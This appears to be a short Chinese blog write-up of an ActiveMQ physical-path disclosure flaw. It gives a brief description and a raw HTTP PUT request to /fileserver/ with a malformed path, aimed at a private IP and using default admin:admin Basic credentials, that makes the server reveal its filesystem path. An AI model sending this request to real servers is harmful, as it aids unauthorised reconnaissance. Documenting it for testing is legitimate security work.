## ActiveMQ物理路径泄漏漏洞
### 漏洞简介
ActiveMQ默认开启PUT请求,当开启PUT时,构造好Payload(即不存在的目录),Response会返回相应的物理路径信息
### 复现过程
“`bash
Request Raw:
PUT /fileserver/a../../%08/..%08/.%08/%08 HTTP/1.1
Host: 192.168.197.25:8161
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 4
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容